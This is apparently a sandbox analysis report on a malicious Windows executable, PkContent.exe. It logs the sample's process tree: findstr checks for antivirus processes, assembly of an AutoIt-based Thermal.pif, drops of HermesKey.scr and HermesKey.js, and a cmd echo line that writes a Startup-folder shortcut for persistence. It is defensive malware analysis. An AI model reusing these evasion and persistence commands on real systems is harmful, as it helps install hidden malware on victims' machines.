Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0013D45D12_2_0013D45D
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0013F62812_2_0013F628
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0012166312_2_00121663
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001416B412_2_001416B4
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0012F6A012_2_0012F6A0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001478C312_2_001478C3
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014DBA512_2_0014DBA5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00141BA812_2_00141BA8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00159CE512_2_00159CE5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0013DD2812_2_0013DD28
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014BFD612_2_0014BFD6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00141FC012_2_00141FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0001B02018_2_0001B020
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000194E018_2_000194E0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00019C8018_2_00019C80
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000323F518_2_000323F5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0009840018_2_00098400
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0004650218_2_00046502
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0004265E18_2_0004265E
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0001E6F018_2_0001E6F0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003282A18_2_0003282A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000489BF18_2_000489BF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00090A3A18_2_00090A3A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00046A7418_2_00046A74
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00020BE018_2_00020BE0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003CD5118_2_0003CD51
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0006EDB218_2_0006EDB2
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00078E4418_2_00078E44
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00090EB718_2_00090EB7
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00046FE618_2_00046FE6
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000333B718_2_000333B7
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003F40918_2_0003F409
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0002D45D18_2_0002D45D
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0002F62818_2_0002F628
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0001166318_2_00011663
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0001F6A018_2_0001F6A0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000316B418_2_000316B4
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000378C318_2_000378C3
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003DBA518_2_0003DBA5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00031BA818_2_00031BA8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00049CE518_2_00049CE5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0002DD2818_2_0002DD28
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00031FC018_2_00031FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003BFD618_2_0003BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\Desktop\PkContent.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 00038B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 00030D17 appears 70 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 00021A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00140D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00131A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00148B30 appears 42 times
Source: PkContent.exe, 00000000.00000002.1318641163.00000000006C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PkContent.exe
Source: PkContent.exe, 00000000.00000003.1317774847.00000000006C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PkContent.exe
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs PkContent.exe
Source: PkContent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.expl.evad.winEXE@28/14@3/0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018A6AD GetLastError,FormatMessageW,12_2_0018A6AD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00178DE9 AdjustTokenPrivileges,CloseHandle,12_2_00178DE9
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00179399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00179399
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00068DE9 AdjustTokenPrivileges,CloseHandle,18_2_00068DE9
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00069399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00069399
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00184148
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,12_2_0018443D
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey SolutionsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:788:120:WilError_03
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsx6D5D.tmpJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: PkContent.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PkContent.exeReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\user\Desktop\PkContent.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PkContent.exe "C:\Users\user\Desktop\PkContent.exe"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PkContent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00148B75 push ecx; ret 12_2_00148B88
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00038B75 push ecx; ret 18_2_00038B88

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001A59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_001A59B3
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00135EDA
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_000959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_000959B3
